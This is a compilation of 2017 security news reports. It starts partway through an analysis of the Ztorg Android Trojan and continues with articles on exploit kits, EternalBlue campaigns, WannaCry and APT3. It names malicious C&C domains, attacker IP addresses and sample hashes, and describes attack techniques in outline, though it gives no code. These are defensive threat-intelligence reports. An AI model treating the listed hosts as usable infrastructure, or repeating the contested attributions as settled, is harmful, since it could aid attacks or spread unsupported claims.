The main purpose of dpl.apk is to download and install apps. It receives commands from the following C&Cs:

log.agoall.com/gkview/info/,
active.agoall.com/gnview/api/,
newuser.agoall.com/oversea_adjust_and_download_write_redis/api/download/,
api.agoall.com/only/
The module downloads them into the DownloadProvider directory on the SD card. This folder is one of the sources used to distribute the Ztorg Trojan.

In my case, it downloaded five malicious APKs; four of them were installed and listed in the Installed apps section.

.gma.apk (6AAD1BAF679B42ADB55962CDB55FB28C)

This Trojan tries to download the additional isgqm.jar module with the main functionality in the same way as the other modules. Unfortunately, its C&Cs (a.gqkao.com/igq/api/, d.oddkc.com/igq/api/, 52.74.240.149/igq/api, api.jigoolng.com/only/) didn’t return any commands, so I don’t know the main purpose of this app.

This app can modify /system/etc/install-recovery.sh, and download files to the /.androidgp/ folder on the SD card. These files will be installed in the system folders (/system/app/ or /system/priv-app/).

I assume this Trojan is needed to update other modules.

.gmq.apk (93016a4a82205910df6d5f629a4466e9)

This Trojan wasn’t able to download its additional module isgq.jar from the C&Cs (a.apaol.com/igq/api, c.oddkc.com/igq/api, 52.74.240.149/igq/api).

Installed apps

The following apps were silently downloaded and installed on the device after infection. All of them have some well-known ad services.

Package Name Detection Md5 Ad modules
co.uhi.tadsafa Trojan-Downloader.AndroidOS.Rootnik.g d1ffea3d2157ede4dcc029fb2e1c3607 mobvista, batmobi
com.friend.booster Trojan.AndroidOS.Ztorg.bo 5c99758c8622339bffddb83af39b8685 mobvista, batmobi
sq.bnq.gkq Trojan-Downloader.AndroidOS.Rootnik.g 10272af66ab81ec359125628839986ae mobvista, batmobi
main.ele.com.blood Trojan.AndroidOS.Ztorg.bo 8572aec28df317cd840d837e73b2554a mobvista
They also have malicious modules that start downloading ads and apps when commanded by their C&C.

But using clean advertising networks like Mobvista and Batmobi creates an ad recursion, because these ads were used to distribute the original infected app.

A few new folders appear on the SD card after a successful infection. Among them:

.googleplay_download
.nativedroid
.sysAndroid
DownloadProvider
All of these folders were used by some of the malware to spread the initial Ztorg infection and were used after infection to distribute other apps – some of them malicious.

Other Trojans

Despite the fact that almost every Trojan from Google Play found during this research had one of the three malicious modules described in this research, there were also a few other Trojans.

One of them, called Money Converter (com.countrys.converter.currency, 55366B684CE62AB7954C74269868CD91), had been installed more than 10,000 times from Google Play. Its purpose is similar to that of the .gmtgp.apk module – it uses Accessibility Services to install apps from Google Play. Therefore, the Trojan can silently install and run promoted apps without any interaction with the user, even on updated devices where it cannot gain root rights.

Ztorg: money for infecting your smartphone

It used the same command and control servers as .gmtgp.apk.

Conclusion

During the research period I found that Trojan.AndroidOS.Ztorg was uploaded to Google Play Store almost 100 times as different apps. The first of them was called Privacy Lock, had more than 1 million installations and was uploaded in mid-December 2015. Every month after I started tracking this Trojan in September 2016 I was able to find and report at least three new infected apps on Google Play. The most recent apps that I found were uploaded in April 2017, but I’m sure there will be more soon.

All of these apps were popular. Furthermore, their popularity grew very fast, with tens of thousands of new users sometimes being infected each day.

I found out that these Trojans were actively distributed through advertising networks. All these malicious campaigns contained the same URL, which allows me to easily track down any new infected apps.

I was surprised that these Trojans were distributed through apps that were paying users for installing promoted apps. It turned out that some users got paid a few US cents for infecting their device, though they didn’t know it was being infected.

Another interesting thing about the distribution of this Trojan is that after infection it used some of the advertising networks to show infected users ads about installing promoted apps. It creates a kind of ad recursion on infected devices – they become infected because of a malicious ad from an advertising network and after infection they see ads from the same advertising network because of the Trojan and its modules.

Cybercriminals were able to publish infected apps on Google Play because of the numerous techniques they used to bypass detection. They continued to develop and use new features in their Trojans all the time. This Trojan has modular architecture and it uses several modules with different functionality and each of them can be updated via the Internet. During infection Ztorg uses several local root exploit packs to gain root rights on a device. Using these rights allows the Trojan to achieve persistence on the device and deliver ads more aggressively.


Terror Exploit Kit Gets Fingerprinting Capabilities

22.5.2017 securityweek Exploit
Recent changes made to the Terror exploit kit (EK) allow it to fingerprint victims and target specific vulnerabilities instead of carpet bombing the victims with many exploits at the same time, Talos researchers discovered.

Terror was initially detailed in January this year, when security researchers observed that it was targeting vulnerabilities with exploits taken from Metasploit or from either Sundown or Hunter EKs. Terror activity increased last month, after the Sundown EK inexplicably disappeared from the threat landscape.

Previously, the EK was observed carpet bombing victims with many exploits at the same time, even if those exploits didn’t match the targeted browser environment. Now, the threat has added more exploits and is fingerprinting victim’s system to determine what exploit would be successful based on operating system, patch level, browser version, and installed plugins.

The use of more targeted exploits makes it more difficult for investigators to determine which exploits the toolkit has. However, “it is interesting to note that the adversaries are using an URL parameter in cleartext for the vulnerability they are going to exploit,” Talos says.

Additionally, Talos researchers identified a potentially compromised legitimate web site that appears to be operating as a malware gate. Initially redirecting visitors to a RIG landing page, the gate switched to Terror after a single day.

The compromised website redirects users to the EK landing page by using a HTTP 302 Moved Temporarily response. The page uses obfuscated Javascript code to evaluate the victim's browser environment, then uses the return value of this function to submit a hidden form called ‘frm’.

More proof that the EK has moved away from its carpet bombing approach is the manner in which it selects exploits when attempting to infect the victim. The researchers were served different files when accessing the site via Internet Explorer 11 than when using Internet Explorer 8.

The EK also uses cookie-based authentication for downloading the exploits, which prevents third-parties from accessing them, the security researchers discovered. This approach prevents not only investigators from learning where from or how the victims were infected, but also stops competitors from stealing the exploits.

“We have seen that the exploit kit market is experiencing an ongoing change. Big players in this market disappear while new ones show up. The new players are fighting for customers by constantly improving their quality and techniques. They modify these techniques on an ongoing basis to improve their capability to bypass security tools. This clearly shows how important it is to make sure that all your systems are up to date,” Talos concludes.


Stealth Backdoor Abused NSA Exploit Before WannaCrypt

22.5.2017 securityweek BigBrothers
In the aftermath the WannaCry ransomware outbreak, security researchers discovered numerous attacks that have been abusing the same EternalBlue exploit for malware delivery over the past several weeks.

Targeting a Server Message Block (SMB) vulnerability on TCP port 445, the exploit was made public in April by the group of hackers calling themselves “The Shadow Brokers” and is said to have been stolen from the National Security Agency-linked Equation Group. The targeted flaw was patched in March.

The fast spreading WannaCry brought EternalBlue to everyone’s attention, yet other malware families have been using it for infection long before the ransomware started using it. One of them was the Adylkuzz botnet, active since April 24, researchers revealed.

Now, Cyphort says that evidence on a honeypot server suggests attacks on SMB were active in early May, and they were dropping a stealth Remote Access Trojan (RAT) instead of ransomware. The malware didn’t have the worm component and didn’t spread like WannaCry.

The malware appears to have been distributed from an IP (182.18.23.38) located in China. Following successful exploitation, an encrypted payload is sent as a shellcode, and the security researchers found a DLL embedded in the shellcode, which they say “is basically a Trojan which downloads additional malware and receives commands from its controller.”

One of the files downloaded by this malware is meant to close port 445, thus preventing other malware from abusing the same flaw. Another file is believed to be a second-stage payload. The RAT sets a series of Registry Run entries to download and execute additional malware, the researchers say.

The malware attempts to delete a number of users and terminate and/or delete various files or processes and a memory dump reveals that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The RAT can receive and execute commands from server, monitor the screen, capture audio and video, monitor the keyboard, transfer data, delete files, terminate processes, execute files, enumerate files and processes, download files, and control the machine.

Because the threat closes port 445, Cyphort believes the actor was aware of the EternalBlue vulnerability and was attempting to keep other malware out of the vulnerable machines.

“We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs,” the security researchers say.

In a report this week, Secdo also claims to have found evidence of malware abusing EternalBlue weeks before WannaCry emerged. One of the malicious programs appears to be a ransomware family that also steals user credentials.

A “new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April,” the researchers say. “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

As part of this attack, the researchers say, actors were using an EternalBlue-based worm to infect all machines in a compromised network, and were also deploying a backdoor for persistence, or exfiltrated login credentials.

One of the attacks originated from a Russian IP (77.72.84.11). Using the NSA-linked exploit for compromise, attackers spawned a thread inside a legitimate application, and used it to download multiple modules, including SQLite DLL from SourceForge to steal login credentials from Firefox.

Stolen data is exfiltrated through the TOR network, after which “a ransomware variant of CRY128 that runs purely in-memory encrypts all the documents on the system,” the researchers say.

The recently discovered UIWIX ransomware that spreads via the EternalBlue exploit is also being executed only in memory, resulting in a fileless infection. UIWIX also contains code meant to steal a broad range of login credentials.

Another attack was linked to a Chinese actor and involved the distribution of a backdoor. The attack starts with process injection, similar to the above, but ends with the download of a known root-kit backdoor (based on Agony). The downloaded file, 666.exe, is blocked by antivirus programs.

“Based on these findings, we suspect that the scope of the damage is much greater than previously thought, and that there are at least 3 different groups that have been leveraging the NSA exploit to infect enterprise networks since late April,” Secdo notes.

In January, United States Computer Emergency Readiness Team (US-CERT) issued an alert after Shadow Brokers revealed they had a zero-day exploit targeting SMB up for sale. In February, a Windows’ SMBv3 0-day vulnerability (CVE-2017-0016) was assessed with a High severity rating, after initially believed to be Critical.


North Korea Denies Role in Global Cyberattack

22.5.2017 securityweek Cyber
North Korea on Friday angrily dismissed reports linking its isolated regime to the global cyberattack that held thousands of computers to virtual ransom.

Up to 300,000 computers in 150 countries were hit by the WannaCry worm, which seizes systems and demands payment in Bitcoin to return control to users.

The code used in the latest attack is similar to that used in past hacks blamed on Kim Jong-Un's regime, leading some to point the finger at Pyongyang.

But the North has now denied the claims, notably but not exclusively advanced by South Korean experts, and hit back Friday to accuse its opponents of spreading propaganda.

"It is ridiculous," Kim In-Ryong, North Korea's deputy ambassador to the United Nations, told reporters, suggesting Washington and Seoul were behind the allegation.

"Whenever something strange happens, it is the stereotyped way of the United States and the hostile forces to kick off a noisy anti-DPRK campaign."

Related: WannaCry Doesn't Fit North Korea's Style, Interests, Experts Say

Seoul internet security firm Hauri, known for its vast troves of data on Pyongyang's hacking activities, has been warning of ransomware attacks since last year.

The firm's Simon Choi told AFP that the WannaCry malware shares code with tools used to target Sony Pictures and Bangladesh, in previous attacks blamed on the North.

Researchers in the US, Russia and Israel have also pointed to a potential North Korean link -- but it is notoriously hard to attribute cyberattacks.

Google researcher Neel Mehta has shown similarities between WannaCry and code used by the Lazarus hacking group, widely believed to be connected to Pyongyang.


China Killed or Jailed Up to 20 US Spies in 2010-12: Report

22.5.2017 securityweek CyberSpy
Beijing systematically dismantled CIA spying efforts in China beginning in 2010, killing or jailing more than a dozen covert sources, in a deep setback to US intelligence there, The New York Times reported Sunday.

The Times, quoting 10 current and former American officials who spoke on condition of anonymity, described the intelligence breach as one of the worst in decades.

It said that even now intelligence officials are unsure whether the US was betrayed by a mole within the CIA or whether the Chinese hacked a covert system used by the CIA to communicate with foreign sources.

Of the damage inflicted on what had been one of the most productive US spy networks, however, there was no doubt: at least a dozen CIA sources were killed between late 2010 and the end of 2012, including one who was shot in front of colleagues in a clear warning to anyone else who might be spying, the Times reported.

In all, 18 to 20 CIA sources in China were either killed or imprisoned, according to two former senior American officials quoted. It was a grave setback to a network that, up to then, had been working at its highest level in years.

Those losses were comparable to the number of US assets lost in the Soviet Union and Russia because of the betrayals of two infamous spies, Aldrich Ames and Robert Hanssen, the report said.

Western espionage services have traditionally found it exceptionally hard to develop spy networks in China and Russia.

The CIA's mole hunt in China, following the severe losses to its network there, was intense and urgent. Nearly every employee of the US Embassy in Beijing was scrutinized at one point, the newspaper said.

Meantime, then-president Barack Obama's administration was demanding to know why its flow of intelligence from China had slowed.

The revelations come as the CIA seeks to determine how some of its highly sensitive documents were released two months ago by WikiLeaks, and the FBI examines possible links between the Donald Trump campaign and Russia.

Both the CIA and the FBI declined to comment.


Medical Devices infected by WannaCry Ransomware in US hospitals
21.5.2017 securityaffairs Ransomware

According to Forbes, the dreaded WannaCry ransomware has infected medical devices in at least two hospitals in the United States.
WannaCry infected 200,000 computers across 150 countries in a matter of hours last week, it took advantage of a tool named “Eternal Blue”, originally created by the NSA, which exploited a vulnerability present inside the earlier versions of Microsoft Windows. This tool was soon stolen by a hacking group named “Shadow Brokers” which leaked it to the world in April 2017.

Now security experts report the WannaCry ransomware has infected also medical devices as reported by Thomas Fox-Brewster on Forbes.

The journalist published an image of an infected medical device, likely a Bayer Medrad radiology equipment that is used to inject contrast agents inside the human body to aid in MRI scans.

“A source in the healthcare industry passed Forbes an image of an infected Bayer Medrad device in a U.S. hospital. The source did not say which specific hospital was affected, nor could they confirm what Bayer model was hacked. But it appears to be radiology equipment designed to help improve imaging.” states Forbes.”More specifically, it’s a device used for monitoring what’s known in the industry as a “power injector,” which helps deliver a “contrast agent” to a patient. Such agents consist of chemicals that improve the quality of magnetic resonance imaging (MRI) scans.”

wannacry ransomware medical devices
WannaCry ransomware on a Bayer radiology system – Source Forbes

The medical device was infected by the WannaCry ransomware because it was running on a version of the Windows Embedded operating system and supporting the SMBv1 protocol.

The name of the hospital where the device was infected was not reported to Forbes, Bayer confirmed it had received two reports from customers in the US.

According to a Bayern spokesperson, the affected hospitals faced limited problems.

“Operations at both sites were restored within 24 hours,” said the spokesperson. “If a hospital’s network is compromised, this may affect Bayer’s Windows-based devices connected to that network.”

Bayer plans to send out a Microsoft patch for its Windows-based devices “soon.”

According to Forbes, a source with the Health Information Trust Alliance (HITRUST) confirmed that WannaCry ransomware also infected and locked down Windows-based medical devices belonging to Siemens.

Siemens admitted that Healthineers products are vulnerable to WannaCry.

“Siemens Healthineers recognizes that some of its customers may be facing impacts from the recent major cyber-attack known as “WannaCry”.” reads the advisory published by Siemens. “Select Siemens Healthineers products may be affected by the Microsoft vulnerability being exploited by the WannaCry ransomware. The exploitability of any such vulnerability depends on the actual configuration and deployment environment of each product.”

Ransomware is a serious threat for the healthcare industry, this specific category of malware could infect systems at hospitals preventing the personnel from using any medical equipment and making ordinary operations (i.e. managing patient data or medical treatment schedules).

WannaCry affected 40 hospitals in the UK. let’s hope operators in the healthcare industry will understand the importance of cyber security for the industry.


Stegano Exploit Kit now uses the Diffie-Hellman Algorithm
21.5.2017 securityaffairs Exploit

The Stegano exploit kit, also known as Astrum, continues to evolve, recently its authors adopted the Diffie-Hellman algorithm to hinder analysis.
The Stegano exploit kit made was associated in the past with a massive AdGholas malvertising campaign that delivered malware, mostly Gozi and RAMNIT trojans. Experts at TrendMicro also observed the exploit kit in the Seamless malvertising campaign.

“Astrum’s recent activities feature several upgrades and show how it’s starting to move away from the more established malware mentioned above. It appears these changes were done to lay the groundwork for future campaigns, and possibly to broaden its use. With a modus operandi that deters analysis and forensics by abusing the Diffie-Hellman key exchange, it appears Astrum is throwing down the gauntlet.” reads the analysis published by Trend Micro.

Stegano exploit kit Diffie-Hellman

In March, the French research Kafeine reported the Stegano EK exploiting the information disclosure vulnerability tracked as CVE-2017-0022. Hackers exploited the flaw to evade antivirus detection and analysis.

A month later, the Stegano exploit kit was updated to prevent security researchers from replaying the malicious network traffic.

“We found that this anti-replay feature was designed to abuse the Diffie-Hellman key exchange—a widely used algorithm for encrypting and securing network protocols. Angler was first observed doing this back in 2015.” continues the analysis.

“Implementing the Diffie-Hellman key exchange prevents malware analysts and security researchers from getting a hold of the secret key Astrum uses to encrypt and decrypt their payloads. Consequently, obtaining the original payload by solely capturing its network traffic can be very difficult.”

According to the experts, the Astrum/ Stegano exploit kit includes exploit codes for a number of vulnerabilities in Adobe Flash, including the CVE-2015-8651 RCE, the CVE-2016-1019 RCE, and the out-of-bound read bug flaw tracked as CVE-2016-4117.

Experts highlighted that currently the Stegano Exploit Kit isn’t used to deliver malware and associated traffic is very low, both circumstances suggest we can soon observe a spike in its activity.

“It wouldn’t be a surprise if [Astrum/Stegano’s] operators turn it into an exclusive tool of the trade—like Magnitude and Neutrino did—or go beyond leveraging security flaws in Adobe Flash. Emulating capabilities from its predecessors such as fileless infections that can fingerprint its targets and deliver encrypted payloads shouldn’t be far off,” concluded Trend Micro.


Researchers found a link between the APT3 Threat Group and the Chinese Intelligence Agency
21.5.2017 securityaffairs  APT

Security experts at threat intelligence firm Record Future have found a clear link between APT3 cyber threat group and China’s Ministry of State Security.
The curtain has been pulled back a little on the Chinese Intelligence Agency intelligence gathering structure — and it includes private security contractors and the network vendor supply chain.

In 2010, security vendor FireEye identified the Pirpi Remote Access Trojan (RAT) which exploited a then 0-day vulnerability in Internet Explorer versions 6, 7 and 8. FireEye named the threat group APT3 which has also been described as TG-0100, Buckeye, Gothic Panda, and UPS and described them as “one of the most sophisticated threat groups” being tracked at the time.

Since then, APT3 has been actively penetrating corporations and governments in the US, UK and most recently Hong Kong — and everyone has been trying to figure out who they are. APT3 functions very differently than 3LA, the former Chinese military hacking organization leading to the assumption that APT3 is not part of the military complex. At least not officially.

On May 9th, 2017, an unknown party using the alias ‘intrusiontruth’ published a series of blogs posts describing connections between the Pirpi RAT command and control components and shareholders of the Chinese security contractor Guangzhou Boyu Information Technology Company, aka Boyusec.

“On May 9, a mysterious group calling itself “intrusiontruth” identified a contractor for the Chinese Ministry of State Security (MSS) as the group behind the APT3 cyber intrusions.” states the analysis published by Recorder Future.

The names of two specific shareholders of Boyusec appear in the domain registration for the Pirpi C&C servers. This is particularly interesting because Boyusec supports the Chinese Ministry of State Security (MSS) by collecting civilian human intelligence. Think of them as an outsourcer for a government agency like the United States’ National Security Agency (NSA).

Also interesting is that in 2016 a Pentagon report described the relationship between Boyusec and network equipment manufacturer, Huawei. According to the report, the two companies were colluding to develop security equipment with embedded backdoors which would likely be used by Boyusec to compromise Huawei customers.

“In November 2016, the Washington Free Beacon reported that a Pentagon internal intelligence report had exposed a product that Boyusec and Huawei were jointly producing.” continues the analysis.”According to the Pentagon’s report, the two companies were working together to produce security products, likely containing a backdoor, that would allow Chinese intelligence “to capture data and control computer and telecommunications equipment.” The article quotes government officials and analysts stating that Boyusec and the MSS are “closely connected,” and that Boyusec appears to be a cover company for the MSS.”

To protect our networks, it is important to assess the threats. An important part of threat assessment is to anticipate the motivation of the attackers. APT3 has demonstrated above average skills and has been active for a long time. Add ties to the network vendor supply chain and you have the makings of a dangerous adversary. As part of the Chinese MSS structure you can start to guess at motivation. With this new information, it is a good time to reassess your threat model.

APT3 China

“The implications are clear and expansive. Recorded Future’s research leads us to attribute APT3 to the Chinese Ministry of State Security and Boyusec with a high degree of confidence. Boyusec has a Boyusec has a documented history of producing malicious technology and working with the Chinese intelligence services.” concludes the analysis.


Google Adds New Behavior-Based Malware Scanner To Every Android Device
20.5.2017 thehackernews Android
In order to keep its billions of users safe, Google has introduced another security defense for its Android devices, called Google Play Protect.
Google Play Protect, which is part of the Google Play Store app, uses machine learning and app usage analysis to weed out the dangerous and malicious apps, which have always been albatross around the tech giant's neck.
Since Google Play Protect actually comes with the Google Play Store, users do not need to install or activate this security feature separately.
Google Play Protect for Android devices consists:
App scanning
Anti-Theft Measures
Browser Protection
Play Protect's App Scanning Feature
Google Play Protect is an always-on service on devices which said to scan 50 billion apps each day across a billion Android devices to ensure they are safe.
Google already has a number of security measures in place to help keep your smartphones safe, including Verify Apps and its Bouncer service, but once apps are uploaded to the Play Store and installed on your device, Google does not have anything in place to monitor the behavior of those apps – something that most malware apps were abusing.
Running automatically in the background, Google Play Protect is actually built into devices, which will not only analyse apps before appearing on the Play Store, but also monitor them once installed on the device, including apps that have been installed from third-party stores as well.
For this, Google makes use of machine learning algorithms that automatically compares app behavior and distinguishes those acting abnormally, and if encounters any malicious app, it warns you or even disables the app to prevent further harm.
Google says it works around the clock to keep up with the latest threats
Google says the new machine learning system regularly updates to help Android ecosystem stay one step ahead of any potential threats by always looking out for "new risks, identifying potentially harmful apps and keeping them off your device or removing them."
Play Protect's Anti-Theft Measures
With the introduction of Google Play Protect, Android Device Manager has been replaced with Find My Device, use to locate lost and misplaced devices.
You can use the browser or any other device to remotely call, locate, and lock, your Android device or even erase the data to protect sensitive information remotely.
Find My Device is the same old solution, but Google included it into the Google Play Protect program.
Play Protect's Browser Protection
With Safe Browsing feature in Chrome, Play Protect lets users stay safe while browsing the Internet.
Usually, virus, malware and worm land on to your smartphones and computers via malicious web browsers. So, if you visit any website that is acting suspicious, Safe Browsing feature will warn you and block websites that feel sketchy or seems to be unsafe for you.
Google Play Protect service will be rolling out to Android devices over the coming weeks.


More Hacking Groups Found Exploiting SMB Flaw Weeks Before WannaCry
20.5.2017 thehackernews BigBrothers

Since the Shadow Brokers released the zero-day software vulnerabilities and hacking tools – allegedly belonged to the NSA's elite hacking team Equation Group – several hacking groups and individual hackers have started using them in their own way.
The April's data dump was believed to be the most damaging release by the Shadow Brokers till the date, as it publicly leaked lots of Windows hacking tools, including dangerous Windows SMB exploit.
After the outbreak of WannaCry last week, security researchers have identified multiple different campaigns exploiting Windows SMB vulnerability (CVE-2017-0143), called Eternalblue, which has already compromised hundreds of thousands of computers worldwide.
I have been even confirmed by multiple sources in hacking and intelligence community that there are lots of groups and individuals who are actively exploiting Eternalblue for different motives.
Moreover, the Eternalblue SMB exploit (MS17-010) has now been ported to Metasploit, a penetration testing framework that enables researchers as well as hackers to exploit this vulnerability easily.
Cybersecurity startup Secdo, an incident response platform, has recently discovered two separate hacking campaigns using the same Eternalblue SMB exploit at least three weeks before the outbreak of WannaCry global ransomware attacks.
So, it would not be surprised to find more hacking groups, state-sponsored attackers, financially motivated organized criminal gangs and gray hat hackers exploiting Eternalblue to target large organizations and individuals.

The two newly discovered hacking campaigns, one traced back to Russia and another to China, are much more advanced than WannaCry, as sophisticated hackers are leveraging Eternalblue to install backdoors, Botnet malware and exfiltrate user credentials.
According to Secdo, these attacks might pose a much bigger risk than WannaCry, because even if companies block WannaCry and patch the SMB Windows flaw, "a backdoor may persist and compromised credentials may be used to regain access" to the affected systems.
Both campaigns are using a similar attack flow, wherein attackers initially infect the target machine with malware via different attack vectors, then uses Eternalblue to infect other devices in the same network and finally inject a stealthy thread inside legitimate applications, which is then used to achieve persistence by either deploying a backdoor or exfiltrating login credentials.
Russian Campaign: Credential-Theft Attacks

Secdo discovered that attackers are injecting a malicious thread into the 'lsass.exe' process using Eternalblue.
Once infected, the thread began downloading multiple malicious modules and then access SQLite DLL to retrieve users' saved login credentials from Mozilla's FireFox browser.
The stolen credentials are then sent to the attacker's command-and-control server via the encrypted Tor network in order to hide the real location of the C&C server.
Once sent, a ransomware variant of CRY128, which is a member of the infamous Crypton ransomware family, starts running in the memory and encrypts all the documents on the affected system.
According to Secdo, "at least 5 of the most popular Next Gen AV vendors and Anti-Malware vendors were running on the endpoints and were unable to detect and stop this attack. This is most likely due to the thread only nature of the attack."
This attack has been traced back to late April, that's three weeks prior to the WannaCry outbreak. The attack originates from Russia-based IP address (77.72.84.11), but that doesn't mean the hackers are Russian.
Chinese Campaign: Installs Rootkit and DDoS Botnet

This campaign was also seen in late April.
Using Eternalblue, a malicious thread is spawned inside of the lsass.exe process, similar to the above-mentioned credential theft attack.
But only instead of remaining purely in-memory, the initial payload then connects back to a Chinese command-and-control server on port 998 (117.21.191.69) and downloads a known rootkit backdoor, which is based on ‘Agony rootkit’ to make persistent.
Once installed, the payload installs a Chinese Botnet malware, equipped with DDoS attack functionality, on the affected machine.
"These attacks demonstrate that many endpoints may still be compromised despite having installed the latest security patch," Secdo concluded.
"We highly recommend using a solution that has the ability to record events at the thread level in order to hunt, mitigate and assess potential damage as soon as possible."
These malicious campaigns went unnoticed for weeks because unlike WannaCry, the purpose of these attacks was different, holding affected systems for a long time by achieving persistent and stealing credentials to regain access.
The recent example is of "Adylkuzz," a recently-discovered stealthy cryptocurrency-mining malware that was also using Windows SMB vulnerability at least two weeks before the outbreak of WannaCry ransomware attacks.
These attacks are just the beginning, as attacks like WannaCry have not been completely stopped and given the broad impact of the NSA exploits, hackers and cyber criminals are curiously waiting for the next Shadow Brokers release, which promised to leak more zero-days and exploits from next month.
Since the attackers are currently waiting for new zero-days to exploit, there is very little users can do to protect themselves from the upcoming cyber attacks.
You can follow some basic security tips that I have mentioned in my previous article about how to disable SMB and prevent your devices from getting hacked.


WannaCry Does Not Fit North Korea's Style, Interests: Experts

20.5.2017 securityweek Ransomware
Some experts believe that, despite malware code similarities, the WannaCry ransomware is unlikely to be the work of North Korea, as the attack does not fit the country’s style and interests.

The WannaCry ransomware, also known as Wanna Decryptor, WanaCrypt0r, WannaCrypt, Wana Decrypt0r and WCry, has hit hundreds of thousands of systems worldwide, including ones housed by banks, hospitals, ISPs, government agencies, transportation companies and manufacturing plants.

The first clue that the WannaCry ransomware may have been created by North Korea was uncovered by Google researcher Neel Mehta. The expert noticed that a variant of WannaCry making the rounds in February, when the threat was less known, had code similarities with a tool used by the North Korea-linked cyber espionage group named Lazarus. The code in question was removed from later versions of the ransomware.

Security firms such as Symantec and Kaspersky confirmed the connection to Lazarus, and Kaspersky said it was “improbable” that this was a false flag. Even the Shadow Brokers, the group that leaked the Equation Group exploits leveraged by WannaCry, attributed the attack to North Korea.

However, not everyone agrees that North Korea is behind WannaCry. The threat intelligence team at endpoint security firm Cybereason believes North Korea is unlikely to be behind the campaign.

“Nothing in North Korea’s past cyber campaigns or in their conventional military and foreign policy fit this mold. Looking at national identity, foreign policy and strategic messaging will greatly reduce the likelihood that Pyongyang ordered this campaign,” the company said in a blog post on Friday.

Related: Industry Reactions to WannaCry Ransomware Attacks

One reason is that North Korea, guided by its self-reliance ideology, has never used commodity malware or generic tools in its cyberattacks. All the tools and exploits leveraged by the Lazarus group have been custom-built, Cybereason said.

Another reason for which North Korea is unlikely to be behind the WannaCry ransomware attack is the fact that China and Russia, two of the country’s biggest allies, were among the most affected. Furthermore, some of Pyongyang’s biggest enemies, including the U.S., Japan and South Korea, had fairly low infection rates.

The Lazarus group has been linked to several high-profile operations, including the 2014 attack on Sony Pictures, the 2016 attack on Bangladesh’s central bank, which resulted in the theft of $81 million, and some more recent campaigns targeting financial institutions. While North Korea has never officially taken responsibility for these attacks, Cybereason pointed out that the country has always left clear hints of its involvement as a way of sending a strategic message.

Since Lazarus has been linked to several profit-driven attacks, there is a possibility that the WannaCry attacks had a similar goal. However, experts believe that if North Korea was behind the campaign and the goal was to make money, it would have likely set up a better payment system, it wouldn’t have bothered removing the Lazarus code from the final version of WannaCry, and it wouldn’t have neglected to register the kill switch domain that allowed researchers to disrupt the campaign.

Cybereason is not the only company that is skeptical of North Korea’s involvement in the WannaCry attack. Bogdan Botezatu, senior e-threat specialist at Bitdefender, also believes that the scenario in which a state-sponsored actor – especially one as sophisticated as Lazarus – would switch to ransomware is unlikely.

“The attack wasn't targeted and there was no clear gain for them,” Botezatu told SecurityWeek. “It's doubtful they would use such a powerful exploit for anything else than espionage.”

The expert pointed out that Bitdefender took WannaCry apart and found only the worm module and the ransomware component – nothing to indicate that the malware could be used for anything else.


Stealth Backdoor Abused NSA Exploit Before WannaCrypt

20.5.2017 securityweek Ransomware
In the aftermath the WannaCry ransomware outbreak, security researchers discovered numerous attacks that have been abusing the same EternalBlue exploit for malware delivery over the past several weeks.

Targeting a Server Message Block (SMB) vulnerability on TCP port 445, the exploit was made public in April by the group of hackers calling themselves “The Shadow Brokers” and is said to have been stolen from the National Security Agency-linked Equation Group. The targeted flaw was patched in March.

The fast spreading WannaCry brought EternalBlue to everyone’s attention, yet other malware families have been using it for infection long before the ransomware started using it. One of them was the Adylkuzz botnet, active since April 24, researchers revealed.

Now, Cyphort says that evidence on a honeypot server suggests attacks on SMB were active in early May, and they were dropping a stealth Remote Access Trojan (RAT) instead of ransomware. The malware didn’t have the worm component and didn’t spread like WannaCry.

The malware appears to have been distributed from an IP (182.18.23.38) located in China. Following successful exploitation, an encrypted payload is sent as a shellcode, and the security researchers found a DLL embedded in the shellcode, which they say “is basically a Trojan which downloads additional malware and receives commands from its controller.”

One of the files downloaded by this malware is meant to close port 445, thus preventing other malware from abusing the same flaw. Another file is believed to be a second-stage payload. The RAT sets a series of Registry Run entries to download and execute additional malware, the researchers say.

The malware attempts to delete a number of users and terminate and/or delete various files or processes and a memory dump reveals that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The RAT can receive and execute commands from server, monitor the screen, capture audio and video, monitor the keyboard, transfer data, delete files, terminate processes, execute files, enumerate files and processes, download files, and control the machine.

Because the threat closes port 445, Cyphort believes the actor was aware of the EternalBlue vulnerability and was attempting to keep other malware out of the vulnerable machines.

“We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs,” the security researchers say.

In a report this week, Secdo also claims to have found evidence of malware abusing EternalBlue weeks before WannaCry emerged. One of the malicious programs appears to be a ransomware family that also steals user credentials.

A “new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April,” the researchers say. “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

As part of this attack, the researchers say, actors were using an EternalBlue-based worm to infect all machines in a compromised network, and were also deploying a backdoor for persistence, or exfiltrated login credentials.

One of the attacks originated from a Russian IP (77.72.84.11). Using the NSA-linked exploit for compromise, attackers spawned a thread inside a legitimate application, and used it to download multiple modules, including SQLite DLL from SourceForge to steal login credentials from Firefox.

Stolen data is exfiltrated through the TOR network, after which “a ransomware variant of CRY128 that runs purely in-memory encrypts all the documents on the system,” the researchers say.

The recently discovered UIWIX ransomware that spreads via the EternalBlue exploit is also being executed only in memory, resulting in a fileless infection. UIWIX also contains code meant to steal a broad range of login credentials.

Another attack was linked to a Chinese actor and involved the distribution of a backdoor. The attack starts with process injection, similar to the above, but ends with the download of a known root-kit backdoor (based on Agony). The downloaded file, 666.exe, is blocked by antivirus programs.

“Based on these findings, we suspect that the scope of the damage is much greater than previously thought, and that there are at least 3 different groups that have been leveraging the NSA exploit to infect enterprise networks since late April,” Secdo notes.

In January, United States Computer Emergency Readiness Team (US-CERT) issued an alert after Shadow Brokers revealed they had a zero-day exploit targeting SMB up for sale. In February, a Windows’ SMBv3 0-day vulnerability (CVE-2017-0016) was assessed with a High severity rating, after initially believed to be Critical.


UIWIX, the Fileless Ransomware that leverages NSA EternalBlue Exploit to spread
20.5.2017 securityaffairs BigBrothers
Security experts discovered a new ransomware family, dubbed UIWIX, that uses the NSA-linked EternalBlue exploit for distribution
